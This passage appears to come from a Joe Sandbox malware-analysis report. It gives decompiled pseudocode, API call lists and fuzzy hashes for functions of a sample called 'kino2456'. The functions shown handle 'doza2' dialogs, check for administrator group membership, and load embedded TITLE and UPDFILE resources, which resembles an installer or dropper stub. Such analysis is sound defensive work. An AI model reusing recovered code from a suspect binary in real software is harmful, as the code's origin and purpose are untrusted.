					SetDlgItemTextA(_t33, 0x834,  *0xfc8d4c);
					SetWindowTextA(_t33, "doza2");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0xfc88b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E00FC30C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x00fc3108
0x00fc310b
0x00fc31b7
0x00fc31ca
0x00fc31d0
0x00fc31d0
0x00fc31da
0x00000000
0x00fc31da
0x00fc3111
0x00fc3114
0x00fc3136
0x00fc3136
0x00fc3138
0x00fc313b
0x00fc3141
0x00000000
0x00fc3143
0x00fc3116
0x00fc311b
0x00fc314b
0x00fc3151
0x00fc3158
0x00fc316a
0x00fc3176
0x00fc317d
0x00fc318b
0x00fc319e
0x00fc31a3
0x00000000
0x00fc31ad
0x00fc3120
0x00000000
0x00000000
0x00fc312a
0x00fc3134
0x00000000
0x00000000
0x00000000
0x00fc3134
0x00fc312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 00FC313B
GetDesktopWindow.USER32 ref: 00FC314B
SetDlgItemTextA.USER32(?,00000834), ref: 00FC316A
SetWindowTextA.USER32(?,doza2), ref: 00FC3176
SetForegroundWindow.USER32(?), ref: 00FC317D
GetDlgItem.USER32(?,00000834), ref: 00FC3185
GetWindowLongA.USER32(00000000,000000FC), ref: 00FC3190
SetWindowLongA.USER32(00000000,000000FC,00FC30C0), ref: 00FC31A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00FC31CA

Strings

doza2, xrefs: 00FC3170

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: doza2
API String ID: 3785188418-612509477
Opcode ID: 7c642443b6c59fd662c4868ba11db2513d98a6716a4b60c903857461824262a3
Instruction ID: e782e9bd93ae0bd5cf5817f3daec4914be177c5320ad69597d27ec35e1c0fae8
Opcode Fuzzy Hash: 7c642443b6c59fd662c4868ba11db2513d98a6716a4b60c903857461824262a3
Instruction Fuzzy Hash: F411D53190412ABFDB115B249F0FF9A3A64EB467B4F188618F811921E0DBB5AA41FB42

Uniqueness

Uniqueness Score: -1.00%

Function 00FC18A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00FC18A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t23 ^ _t53;
				_t25 =  *0xfc8128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00FC6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E00FC17EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0xfc8128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0xfc8128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x00fc18a3
0x00fc18a3
0x00fc18ab
0x00fc18b2
0x00fc18b5
0x00fc18be
0x00fc18c0
0x00fc18c6
0x00fc18c7
0x00fc18ca
0x00fc18cf
0x00fc19c9
0x00fc19d8
0x00fc19d8
0x00fc18df
0x00fc19b8
0x00fc19bd
0x00fc19bf
0x00fc19bf
0x00000000
0x00fc19bd
0x00fc18fa
0x00000000
0x00000000
0x00fc1912
0x00fc19aa
0x00fc19ad
0x00fc19b3
0x00000000
0x00fc1927
0x00fc1927
0x00fc1932
0x00fc1936
0x00fc19a9
0x00fc19a9
0x00000000
0x00fc19a9
0x00fc194c
0x00fc19a2
0x00fc19a3
0x00000000
0x00fc196e
0x00fc1970
0x00fc1999
0x00fc199c
0x00000000
0x00fc199c
0x00fc1972
0x00fc1972
0x00fc1975
0x00fc1984
0x00fc1985
0x00fc198a
0x00000000
0x00000000
0x00000000
0x00fc198c
0x00fc1991
0x00fc1996
0x00000000
0x00fc1996
0x00fc194c

APIs

Part of subcall function 00FC17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00FC18DD), ref: 00FC181A
Part of subcall function 00FC17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00FC182C
Part of subcall function 00FC17EE: AllocateAndInitializeSid.ADVAPI32(00FC18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00FC18DD), ref: 00FC1855
Part of subcall function 00FC17EE: FreeSid.ADVAPI32(?,?,?,?,00FC18DD), ref: 00FC1883
Part of subcall function 00FC17EE: FreeLibrary.KERNEL32(00000000,?,?,?,00FC18DD), ref: 00FC188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00FC18EB
OpenProcessToken.ADVAPI32(00000000), ref: 00FC18F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00FC190A
GetLastError.KERNEL32 ref: 00FC1918
LocalAlloc.KERNEL32(00000000,?,?), ref: 00FC192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00FC1944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00FC1964
EqualSid.ADVAPI32(00000004,?), ref: 00FC197A
FreeSid.ADVAPI32(?), ref: 00FC199C
LocalFree.KERNEL32(00000000), ref: 00FC19A3
CloseHandle.KERNEL32(?), ref: 00FC19AD

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: a10f59c4ff20cf5caa4ba29d97747f7871050a5bb3da6d8ba2c69eb94c6f0b5f
Instruction ID: c79f587a5a4372de2f93dfe83a3bc3bb81714270954b4ebf5953e74c316689e0
Opcode Fuzzy Hash: a10f59c4ff20cf5caa4ba29d97747f7871050a5bb3da6d8ba2c69eb94c6f0b5f
Instruction Fuzzy Hash: 75315A71E0020EAFDB209FA5DE5AFAFBBB8FF05354F100429E545D2151DB30A915EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00FC468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00FC468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x00fc4699
0x00fc469b
0x00fc46a9
0x00fc46af
0x00fc46b4
0x00fc46bc
0x00fc46f9
0x00000000
0x00fc46f9
0x00fc46d9
0x00fc46dd
0x00000000
0x00000000
0x00fc46e5
0x00fc46ef
0x00000000
0x00fc46f5
0x00fc46ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46A0
SizeofResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46C3
LoadResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46CC
LockResource.KERNEL32(00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46D3
memcpy_s.MSVCRT ref: 00FC46E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46EF

Strings

doza2, xrefs: 00FC46E4
TITLE, xrefs: 00FC469D, 00FC46C0

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$doza2
API String ID: 3370778649-4167907646
Opcode ID: d4c6dba4e85bf08ab05f9c62d780493af325d3e4ba4a95b7afd731a14bca3b45
Instruction ID: 1de5c816200c04de14001982a87fba9aba309a29ba3e9951621c957b72937cff
Opcode Fuzzy Hash: d4c6dba4e85bf08ab05f9c62d780493af325d3e4ba4a95b7afd731a14bca3b45
Instruction Fuzzy Hash: 7F01F93264421D7BF31017A55E0FF6B7E2CDBC6FA5F040018FA4A87180C971A840B6B6

Uniqueness

Uniqueness Score: -1.00%

Function 00FC17EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00FC17EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0xfca288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00FC6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x00fc17f6
0x00fc17fd
0x00fc1805
0x00fc180b
0x00fc180d
0x00fc1815
0x00fc1818
0x00fc1820
0x00fc1824
0x00fc182c
0x00fc1832
0x00fc1837
0x00fc1851
0x00fc1854
0x00fc185d
0x00fc1862
0x00fc186c
0x00fc1872
0x00fc1877
0x00fc187e
0x00fc187e
0x00fc1883
0x00fc1883
0x00fc185d
0x00fc188a
0x00fc188a
0x00fc18a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00FC18DD), ref: 00FC181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00FC182C
AllocateAndInitializeSid.ADVAPI32(00FC18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00FC18DD), ref: 00FC1855
FreeSid.ADVAPI32(?,?,?,?,00FC18DD), ref: 00FC1883
FreeLibrary.KERNEL32(00000000,?,?,?,00FC18DD), ref: 00FC188A

Strings

advapi32.dll, xrefs: 00FC1810
CheckTokenMembership, xrefs: 00FC1826

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: ba2742132a95711125190e7056e8e708f165b12b63dcb8b29d0df96703f90d6e
Instruction ID: fae12f22bcef597e2cd85c47c6fb35e8e5da2f18a37634420c035a6f7d490906
Opcode Fuzzy Hash: ba2742132a95711125190e7056e8e708f165b12b63dcb8b29d0df96703f90d6e
Instruction Fuzzy Hash: F6117F71E4020EABDB109FA4DE4BEBEBB78FB45755F10016DFA01E3291DA309D14AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FC3450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E00FC43D0(_t24, _t12);
					SetWindowTextA(_t24, "doza2");
					SetDlgItemTextA(_t24, 0x838,  *0xfc9404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0xfc91dc = 1;
					goto L8;
				}
				return 0;
			}

0x00fc3459
0x00fc345c
0x00fc34d8
0x00fc34de
0x00000000
0x00fc34e0
0x00fc345e
0x00fc3463
0x00fc349a
0x00fc34a0
0x00fc34a7
0x00fc34b2
0x00fc34c4
0x00fc34cb
0x00000000
0x00fc34cb
0x00fc3468
0x00fc346e
0x00fc3474
0x00000000
0x00000000
0x00fc347c
0x00fc348c
0x00fc3490
0x00000000
0x00fc3496
0x00fc3484
0x00000000
0x00000000
0x00fc3486
0x00000000
0x00fc3486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00FC3490
GetDesktopWindow.USER32 ref: 00FC349A
SetWindowTextA.USER32(?,doza2), ref: 00FC34B2
SetDlgItemTextA.USER32(?,00000838), ref: 00FC34C4
SetForegroundWindow.USER32(?), ref: 00FC34CB
EndDialog.USER32(?,00000002), ref: 00FC34D8

Strings

doza2, xrefs: 00FC34AC

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: doza2
API String ID: 852535152-612509477
Opcode ID: 8470dc2b359ae4386a0b425ff99e0cbf6e6c4c3b125f1e0fc47a90212a7c5b3b
Instruction ID: 260f25e2a2436d09ca34aae37004670c88181e90ca49bc07bf3178bcfaa5fdcf
Opcode Fuzzy Hash: 8470dc2b359ae4386a0b425ff99e0cbf6e6c4c3b125f1e0fc47a90212a7c5b3b
Instruction Fuzzy Hash: F3019E3264012EABC71E9F69DF0FF6D3A65EB05794F148018F946875A0CA71AF41FB81

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00FC2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0xfc8004; // 0xd6d6fca6
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0xfc9a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00FC1680(_t65, E00FC17C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E00FC65E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00FC1680(_t65, E00FC17C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00FC6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x00fc2aac
0x00fc2ab7
0x00fc2abc
0x00fc2abe
0x00fc2ac3
0x00fc2ac6
0x00fc2ac9
0x00fc2ace
0x00fc2ae6
0x00fc2bdc
0x00fc2bdc
0x00fc2be0
0x00000000
0x00000000
0x00fc2af2
0x00fc2afc
0x00fc2b00
0x00fc2b05
0x00fc2b05
0x00fc2b0b
0x00fc2bca
0x00fc2bd1
0x00fc2b11
0x00fc2b18
0x00fc2b26
0x00fc2b99
0x00fc2bc8
0x00000000
0x00000000
0x00fc2b9b
0x00fc2bae
0x00fc2bb3
0x00fc2bb5
0x00fc2bb5
0x00fc2bb8
0x00fc2bb8
0x00fc2bba
0x00fc2bbb
0x00000000
0x00fc2bb8
0x00fc2b28
0x00fc2b2e
0x00fc2b33
0x00fc2b39
0x00fc2b3c
0x00fc2b3c
0x00fc2b3e
0x00fc2b3f
0x00fc2b55
0x00fc2b5d
0x00fc2b64
0x00fc2b64
0x00fc2b7a
0x00fc2b7f
0x00fc2b81
0x00fc2b81
0x00fc2b84
0x00fc2b84
0x00fc2b86
0x00fc2b87
0x00fc2bbf
0x00fc2bc1
0x00fc2bc1
0x00fc2b26
0x00fc2bda
0x00fc2bda
0x00fc2be6
0x00fc2be6
0x00fc2bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00FC2AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 00FC2AF2
CharNextA.USER32(?), ref: 00FC2B12
CharUpperA.USER32 ref: 00FC2B1E
CharPrevA.USER32(?,?), ref: 00FC2B55
CharNextA.USER32(?), ref: 00FC2BD4

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 5cb7549b519e16eb7c29aa8c5e07fa7a6a77c482bca35d225ca547835f91d14c
Instruction ID: a39764e27399e5952c8a20f5822950ee5597b494c24f02e2688f37d8de65fc30
Opcode Fuzzy Hash: 5cb7549b519e16eb7c29aa8c5e07fa7a6a77c482bca35d225ca547835f91d14c
Instruction Fuzzy Hash: 9F41273490824A5EDB599F348E56FFD7B69EF92314F18009EE8C283202DF359E46EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC43D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00FC43D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00FC6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x00fc43d0
0x00fc43d8
0x00fc43df
0x00fc43e6
0x00fc43ec
0x00fc43f1
0x00fc4400
0x00fc4403
0x00fc440b
0x00fc4420
0x00fc4429
0x00fc4437
0x00fc4444
0x00fc4447
0x00fc444d
0x00fc4454
0x00fc445b
0x00fc4460
0x00fc4461
0x00fc4467
0x00fc446f
0x00fc4473
0x00fc4473
0x00fc4463
0x00fc4463
0x00fc4463
0x00fc447a
0x00fc4481
0x00fc4484
0x00fc448a
0x00fc4492
0x00fc4496
0x00fc4496
0x00fc4486
0x00fc4486
0x00fc4486
0x00fc44b8

APIs

GetWindowRect.USER32(?,?), ref: 00FC43F1
GetWindowRect.USER32(00000000,?), ref: 00FC440B
GetDC.USER32(?), ref: 00FC4423
GetDeviceCaps.GDI32(00000000,00000008), ref: 00FC442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00FC443A
ReleaseDC.USER32(?,00000000), ref: 00FC4447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 00FC44A2

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: de20171c92ffed651ff3faffad395ff7b2fa9c90700f363003f274b3a3717644
Instruction ID: 21b75f114274ea4150c374921e3097824ad538776aeec95c5be99e5a6e0baf78
Opcode Fuzzy Hash: de20171c92ffed651ff3faffad395ff7b2fa9c90700f363003f274b3a3717644
Instruction Fuzzy Hash: 15311D72E0011DAFCB14CFB8DE4AEEEBBB5EB89314F254169E805F3250DA306D059B64

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00FC6298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E00FC171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0xfc9124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
